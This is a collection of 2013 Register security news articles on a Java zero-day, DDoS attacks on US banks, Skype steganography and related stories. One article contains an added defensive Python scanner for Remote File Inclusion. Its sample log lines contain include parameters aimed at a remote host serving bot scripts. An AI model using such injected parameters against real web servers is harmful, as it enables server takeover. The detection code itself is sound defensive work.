STE WILLIAMS

Kill that Java plugin now! New 0-day exploit running wild online

A new Java zero-day security vulnerability is already being actively exploited to compromise PCs. The best way to defend against the attacks is to disable any Java browser plugins on your systems.

The offending bug is present in fully patched and up-to-date installations of the Java platform, now overseen by database giant Oracle, according to Jaime Blasco, head of labs at security tools firm AlienVault.

“The exploit is the same as the zero-day vulnerabilities we have been seeing in the past year in IE, Java and Flash,” Blasco warned.

“The hacker can virtually own your computer if you visit a malicious link thanks to this new vulnerability. At the moment, there is no patch for this vulnerability, so the only way to protect yourself is by disabling Java.”

The exploit targets Java 7 update 10 and prior versions. No fix is available and early indications suggest that exploitation is widespread. Brian Krebs reckons the exploit has found its way into crimeware toolkits, such as the Blackhole Exploit Kit, which will use the hole to infect victims with software nasties.

Java vulnerabilities were abused by the infamous Flashback Trojan, creating the first botnet on Mac OS X machines in the process last year. In the years before that, attacks on Java and Adobe applications eclipsed browser bugs as hackers’ favourite way into a system.

In all but a limited number of cases Java support in web browsers is not mandatory for home users, unless required by a banking website or similar, so disabling plugins even as a temporary measure is a good idea. Businesses, on the other hand, that rely on Java for particular applications are not so fortunate.

While waiting for a patch from Oracle to plug the gaping hole, instructions on how to turn off Java in browsers can be found in this blog post by Graham Cluley of Sophos. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/10/java_0day/

Anonymous wants DDoS attacks recognized as speech

The loosely organized hackers of Anonymous don’t just launch distributed denial-of-service attacks for the lulz. They do it to send a message, which is why they’ve petitioned the Obama administration to recognize DDoS as a legal form of protest.

The petition, which was filed on the White House’s We the People website, argues that DDoS “is not a form of hacking in any way” and that it’s really not much different than repeatedly hitting the refresh button in your web browser, albeit on a much larger scale:

It is, in that way, no different than any “occupy” protest. Instead of a group of people standing outside a building to occupy the area, they are having their computer occupy a website to slow (or deny) service of that particular website for a short time.

The petition goes on to demand that anyone who has been jailed for participating in a DDoS attack should be immediately released – a nice touch – and that anything related to the attack should be expunged from their criminal records.

DDoS attacks are indeed one of the go-to methods used when Anonymous wants to make a point. The group used the technique to take down UK government websites in August in protest of the treatment of WikiLeaks founder Julian Assange, and again in November in retaliation for Israel’s bombing of sites in Gaza.

Not all such attacks are launched for similarly high-minded reasons, however, and given the recent spate of cyberattacks on US banks – which are now believed to have been orchestrated by the Iranian government – this petition is unlikely to win much sympathy from the White House.

Not to mention the small problem that the We the People site seems to have become a favorite forum for pranks and jokes. Recent oddball petitions have included one request to build a real-life Death Star, and another to remake the American justice system in Judge Dredd’s image.

Then again, I guess that means the pro-DDoS petition isn’t actually the silliest idea we’ve heard.

The petition does not indicate who originally filed it, or whether it represents the work of an organized group or just one person. But hey, this is Anonymous after all, and if you say you’re affiliated, you are.

Whoever filed it, though, they don’t have much company so far. The petition will need to reach a goal of 25,000 signatures to receive an official response from the Obama administration. As of this writing, it had just 681. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/10/anonymous_ddos_free_speech/

US gov blames Iran for cyberattacks on American banks

Denial-of-service attacks against US banks’ web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group called the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks, including US Bancorp, Bank of America, Citigroup and Wells Fargo, that took place in September and December. The stated reason for the “protest” attacks was religious outrage over the continuing presence on YouTube of the inflammatory Innocence of Muslims video.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure WordPress installations were pressed into service as part of a PHP web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks, as well as the use of server-based resources, has apparently convinced US government officials that a state-sponsored entity, namely Iran, rather than hacktivists, is behind the attacks. “There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his arguments, but as the NYT points out, “American officials have not offered any technical evidence to back up their claims”.

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” Carl Herberger, vice president of security solutions at Israel-based security firm Radware, told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. “The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims,” the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware’s website says that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks:

The ‘itsoknoproblembro’ tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The ‘itsoknoproblembro’ script injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DOS flood vectors, the server might act as a bot in a DDOS botnet army.

Although originally designed for general purpose, some variants of this tool found in the wild were customized to act as a proprietary DDOS tool, implementing the flood vector logics inside without the need to upload additional scripts.
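The Radware description above says the initial foothold for an itsoknoproblembro bRobot is usually Remote File Inclusion, i.e. a PHP script that includes a file named by a request parameter, which an attacker points at an external URL. The following scanner is an added defensive example, not Radware’s or Prolexic’s tooling: it reads Common Log Format access-log lines (constructed here for illustration) and flags requests whose query parameters carry a remote include target, which is the signature a web host can hunt for in its own logs.

```python
"""Flag Remote File Inclusion (RFI) attempts in web server access logs.

Added example, not code from Radware or Prolexic. Log lines in
SAMPLE_LOG are constructed; the IP addresses are documentation ranges.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Common Log Format: host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Stream wrappers PHP's include() will fetch when allow_url_include is on.
# An RFI payload has to name one of these in the vulnerable parameter.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

# Constructed sample: a benign page load, two RFI attempts (one with the
# URL percent-encoded, as it often appears in logs) and an unrelated POST.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jan/2013:10:01:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
203.0.113.7 - - [09/Jan/2013:10:01:25 +0000] "GET /index.php?page=http://198.51.100.5/bot.txt? HTTP/1.1" 200 812
198.51.100.9 - - [09/Jan/2013:10:02:40 +0000] "GET /wp-content/plugins/x/y.php?inc=http%3A%2F%2F198.51.100.5%2Fc.txt HTTP/1.1" 404 210
192.0.2.4 - - [09/Jan/2013:10:03:01 +0000] "POST /login.php HTTP/1.1" 302 0
"""


def rfi_params(request_path):
    """Return [(param, value)] for query values that name a remote resource.

    parse_qsl percent-decodes values, so an encoded http%3A%2F%2F payload
    is caught the same way as a plain http:// one.
    """
    hits = []
    query = urlsplit(request_path).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding per log line that carries a suspected RFI parameter.

    A 200 status on a flagged request deserves priority: the include may
    have succeeded, which is how a server ends up as a bRobot.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        hits = rfi_params(m.group("path"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        flag = "LIKELY SUCCESS" if f["status"] == 200 else "attempt"
        print(f'{f["time"]} {f["ip"]} {flag}: {f["params"]}')
```

Run it over real logs with `scan_log(open(path))`; it only inspects query strings, so inclusion through POST bodies or path segments needs a separate check.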

DDoS protection service firm Prolexic launched a suite of SNORT rules and a log analysis tool to defend against itsoknoproblembro last week.

It also links the threat to attacks against the US banking industry. But the tool has also been used against the energy and hosting provider industries. “The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks,” according to a statement by Prolexic.

Using a cloud-based system to launch denial of service attacks, rather than botnet networks of compromised PCs, shows that whoever is behind the attacks is keeping up with the latest trends in technology. It’s hardly evidence of state involvement, at least by itself. There’s nothing in what Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored, much less to point the finger of blame at Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates pwned servers from the compromised PCs (zombies, bots or drones) in conventional botnet networks.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/us_banks_ddos_blamed_on_iran/

UK armed forces could be ‘fatally compromised’ by cyber attack

UK armed forces’ dependence on information and communication technology could leave the nation vulnerable in the event of a cyber attack, according to a study by a committee of MPs.

A report by the Commons’ Defence Committee suggests that the UK Government still has some ground to cover in its approach to the nation’s cyber security even two years after placing cybersecurity as a tier one threat against the UK, on a par with global terrorism. The National Cyber Security Programme allocated £650m over five years to boost the UK’s cyber-security defences. The MoD received a £90m slice of this pie.

Then in 2012-13 alone, the MoD is reaching into its own coffers to supplement these funds by £30m. But it seems even this is not enough.

The MPs heard concerns that the “trend” of using off-the-shelf commercial products is increasing military vulnerability to cyber-assault. There were also suggestions that people with the necessary skills for cyber warfare might be recruited and brought into the military, perhaps as reservists.

Chair of the Committee, Rt Hon James Arbuthnot MP, said extra ministerial attention ought to be applied to develop improved cyber security.

“The Government needs to put in place – as it has not yet done – mechanisms, people, education, skills, thinking and policies which take into account both the opportunities and the vulnerabilities which cyberspace presents,” argued Arbuthnot.

Evidence received by the Committee suggested a sustained cyber assault could impede the ability of the armed forces to “operate effectively” due to their dependence on information and communication technology. The Committee quizzed MoD witnesses about its backup systems in these circumstances.

“We have asked the Government to set out details of the contingency plans it has in place should such an attack occur. If it has none, it should say so – and urgently create some,” Arbuthnot added.

Details of what types of cyberattack might be possible were left out of the committee’s report.

The MPs heard testimony from academics, including John Bassett, associate fellow of cyber-security at the Royal United Services Institute, and Professor Brian Collins, chair of engineering policy at University College London; from military personnel, including Air Vice-Marshal Jonathan Rigby, Major-General Jonathan Shaw, assistant chief of defence staff, and Air Commodore Tim Bishop, head of the global operations security control centre; and from Cabinet ministers Nick Harvey MP, minister for the armed forces, and Rt Hon Francis Maude MP, the Cabinet Office minister.

Written submissions were provided by McAfee, Symantec and Trend Micro as well as BAE Systems, EADS and Raytheon. That group of six from the military industrial anti-malware complex accounted for more than half the written submissions.

Unsurprisingly after this, the MPs came away with the idea that improved MoD and industry collaboration, tied together with increased spending on cyber-security technology, was a good idea.

In a statement, the Committee said it was “impressed by aspects of the co-operation and joint working between the MoD and private sector contractors”. The MPs also supported attempts to boost the cyber security sector in the UK, which would help the MoD “deliver military capabilities both to confront high-end threats and to provide a potential offensive capability”.

Arbuthnot added:

“The opportunity created by cyber tools and techniques to enhance the military capabilities of our Armed Forces is clear. We want to see the MoD explore this thoroughly. For this reason, we support the use of National Cyber Security Programme funding to develop these capabilities, but also wish to be assured that the MoD will maintain its investment in existing defence intelligence services which provide a vital UK cross-government capability.”

Vendors broadly welcomed the committee’s report. Martin Sutherland, Managing Director of BAE Systems Detica commented:

“The UK’s ability to defend itself against cyber attacks does not rest in the hands of any single entity. Ensuring our national and economic security in an increasingly interconnected world requires all organisations – government, public and private sector – to put in place robust cyber security defences as well as appropriate response procedures in the event of a successful attack.

“To improve the effectiveness of these measures we need to encourage more organisations to share best-practice approaches to cyber security and provide more information about the nature of the attacks they’re seeing, particularly given that many private sector firms act as suppliers to Government or are delivering essential services that our nation relies upon every day,” he added.

Sutherland said that the UK is perhaps more prepared for cyber-attack than the defence committee gave it credit for.

“The UK’s strategy is still going through a process of implementation; however it is progressing well and has a mature approach in comparison to many other nations. Interestingly, the UK was placed first of the G20 in its ability to withstand cyber attacks and deploy the appropriate infrastructure for a productive economy, according to Booz Allen Hamilton’s recent Cyber Power Index. However, there is still a long way to go before we can say that we are successfully countering cyber threats.”

Rob Cotton, chief executive of global information assurance firm, NCC Group, stressed the need for the UK military to develop comprehensive information security policy.

“£650m has allegedly been invested in this country’s cyber defences, yet instead of being drilled into real expertise it’s been juggled between departmental budgets. It’s particularly worrying that the best advice offered is repeatedly to simply update antivirus protection – far more sophisticated and sustained responses are needed.

“The targets of a sustained cyber threat would almost certainly include private sector businesses – from energy companies to manufacturing firms and public transport operators – as well as the military itself,” he added. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/defence_cyber_security_review/

Big Brother is prosecuting you: More cops to use court vid chats

Coppers will soon give evidence in almost half the courts in England and Wales from their police stations via video-conferencing links.

Justice minister Damian Green announced the government will triple the number of installed video connections to further free up officers’ time and potentially save taxpayers some cash.

The Ministry of Justice will stump up for the expanded video-over-IP service to spare bobbies the trek to court to give evidence during prosecutions. Instead, they can stay at their base, flick on a webcam and be beamed into a TV monitor in the relevant hearing.

“Under existing practice a considerable amount of time and money is wasted by police officers travelling to and from court and waiting outside the courtroom to give evidence,” said a Ministry of Justice spokesperson.

The seven police forces already kitted out with the video links have used the technology in an estimated 75,000 cases and saved 300 man hours as well as transport costs and cut the need to move prisoners between hearings and custody, according to the ministry. Essex, London, Kent, Cheshire, South Wales, Hertfordshire and West Midlands all use the connections.

There are a total of 42 so-called criminal justice areas in England and Wales, and the new roll-out will reach 20 in total.

Vulnerable witnesses unwilling to be in the same court room as the accused and even defendants on their first hearing can also be beamed into TV screens from afar.

There is no further information on exactly which webcam systems will be used, but the ministry told The Reg that the video feeds are scrambled. The officials also said the video-over-IP service is not Skype, but video-conferencing on a secure network already used by criminal justice workers. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/video_ip_links_to_court/

€1.5bn swiped from EU cards: Fraud mainly takes place in the US

Most of the credit and debit card fraud in Europe can be pinpointed to criminal transactions in the US, a police report has said.

EU police service Europol said that the European Union had invested heavily in the 3-D secure protocol, offered by Visa as Verified by Visa and by MasterCard as Mastercard SecureCode, as well as on the transition to chip-and-PIN, but these security measures weren’t being used worldwide.

Chip-and-PIN (Europay, MasterCard and Visa) has been key to getting rid of domestic card fraud, although organised crime gangs were still pulling in €1.5bn a year from ripping off Europeans, cops said.

Criminals are able to target chip-enabled cards when they’re used in cash machines and payment machines in the US, Dominican Republic, Colombia, Russian Federation, Brazil and Mexico.

“The ultimate solution to this problem would be to implement the EMV standard on a global level, including making United States’ merchants compliant,” Europol said in its report. “Specific discussions on that are currently ongoing, however it is difficult to predict if, and when, the final stage of compliance might be reached.”

With the extra security of PIN numbers for physical transactions, most payment card thievery now happens online, Europol said. Around 60 per cent of fraud losses in 2011 happened in transactions where the card wasn’t seen, such as online or over the phone payments.

Credit card and bank account information traded online is used to create cloned cards, which can then be used to buy goods online. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/european_card_fraud_us/

Crypto boffins smuggle secret messages in silent Skype calls

Polish security researchers have come up with a cunning method to transmit hidden messages using the silence packets transmitted during a Skype call.

The VoIP service transmits voice data in 130-byte packets, and silences in 70-byte packets, a difference that creates a potential means to conceal a hidden encrypted message in the latter. The novel form of steganography was devised by Wojciech Mazurczyk, Krzysztof Szczypiorski and Maciej Karaś, researchers at the Institute of Telecommunications of the Warsaw University of Technology.

The crypto boffins developed an application, dubbed SkypeHide (or SkyDe), that embeds an encrypted message using structured sequences of silent packets. The same software running on a receiving computer is used to extract the concealed message.

Hidden messages can contain text, audio or video content, although the maximum transmission rate of 1kbps would more or less preclude the practical transmission of video clips. Packets generated by SkypeHide would be difficult to distinguish from normal Skype traffic, Trusted Third Party (via Google Translate) reports.

The latest technique builds on earlier research by Mazurczyk and Szczypiorski into steganography using VoIP streams. Four years ago the researchers developed techniques for using unused fields in the RTCP (Real-Time Control Protocol) and RTP (Real-Time Transport Protocol) VoIP protocols to transmit hidden messages.

The researchers hope to present more about the technology at the 1st ACM Workshop on Information Hiding and Multimedia Security in Montpellier, France, in June. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/skype_stego/

Japanese cops cuff cat carrying remote control virus

An anonymous cyber villain has led Japanese police on a merry dance over the past few months, culminating in the capture on Monday of a cat said to be carrying a computer virus on a memory card attached to its collar.

Detectives with the country’s National Police Agency (NPA) nabbed the creature on an island near Tokyo after a bizarre treasure hunt was sparked on New Year’s Day when media outlets received an email offering them the “chance for a big scoop”, AFP reported.

The emails contained a set of riddles designed to lead the recipients to the memory card – although police initially went on a wild goose chase up a mountainside before a further message apparently clarified the location of the pesky feline.

The virus in question is said to be iesys.exe, dubbed the “Remote Control Virus”, which, as the name suggests, is capable of controlling a compromised computer from a remote location, according to Symantec.

This is relevant because the anonymous cyber criminal is believed to have been behind a series of terrorist threats sent last year by email from various IP addresses and posted to popular Japanese Reddit clone 2channel.

These included bomb threats against a school and kindergarten attended by the Emperor’s grandchildren and a warning of an impending killing spree on the streets of Osaka.

In a hugely embarrassing incident during the investigation, the NPA arrested four suspects who were likely victims of iesys.exe – which was used to send the offending emails from their computers – rather than perpetrators of an attack.

One such suspect was held for weeks before a broadcaster was sent another anonymous message which could only have come from the genuine culprit, AFP said.

The shadowy figure remains at large, and police, now thoroughly fed up with this cat-and-mouse game, have announced a Y3 million (£21,400) reward for his, her – or its – capture. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/japan_cyberterror_cat/

Boffins hide messages in Skype ‘silence packets’

A Warsaw-based security researcher says the packets that Skype sends during silence can be used to carry secret messages in a conversation.

When participants in a call are speaking, Skype sends the audio in 130-byte packets, while during silence it sends 70-byte packets. According to New Scientist, Wojciech Mazurczyk of Warsaw University of Technology’s Institute of Telecommunications has created software which he’s dubbed “SkypeHide” to put private, encrypted messages in the silence packets.

This “packet hijack” is hard to detect, Mazurczyk says. “The secret data is indistinguishable from silence-period traffic, so detection of SkypeHide is very difficult,” he claims.

The software was created in collaboration with two other researchers, Maciej Karaś and Krzysztof Szczypiorski.

Mazurczyk says the steganography technique can carry any kind of data – voice, text or video – and while the secret messages only had a data rate of 1K bps during calls, he believes they would be difficult to intercept.

Last year, the now-Microsoft subsidiary denied that it was rewriting its software to be more law-enforcement-friendly. However, agencies worldwide are looking for ways to bring the popular VoIP system under the loving embrace of interception regimes.

The group intends to present SkypeHide at the First ACM Information Hiding and Multimedia Security Workshop, being held at the University of Montpellier in June. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/steganography_in_skype/

Nvidia fixes hole that turns PCs into remote-control toys for hackers

Nvidia has plugged a critical flaw in its graphics card software that allowed hackers to gain “super-user” access to vulnerable PCs over a network.

The Nvidia GeForce display driver update, version 310.90, also features a number of other bug fixes and performance upgrades.

“The vulnerability allows a remote attacker with a valid domain account to gain super-user access to any desktop or laptop running the vulnerable service,” HD Moore, the developer of Metasploit and chief security officer at Rapid7, told SecurityWeek.

“This flaw also allows an attacker (or rogue user) with a low-privileged account to gain super-access to their own system, but the real risk to enterprises is the remote vector,” he added.

The critical privilege elevation flaw was discovered by UK security researcher Peter Winter-Smith.

The driver update can be downloaded here. The accompanying summary of the update mentions a “security update for the Nvidia Display Driver service (nvvsvc.exe)” in one sentence but concentrates on claimed performance improvements for gamers, particularly fans of Call of Duty: Black Ops 2 and Assassin’s Creed III.

More details of the update can be found in a bumper 67-page release notes document on Nvidia’s website (PDF). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/08/nvidia_security_update/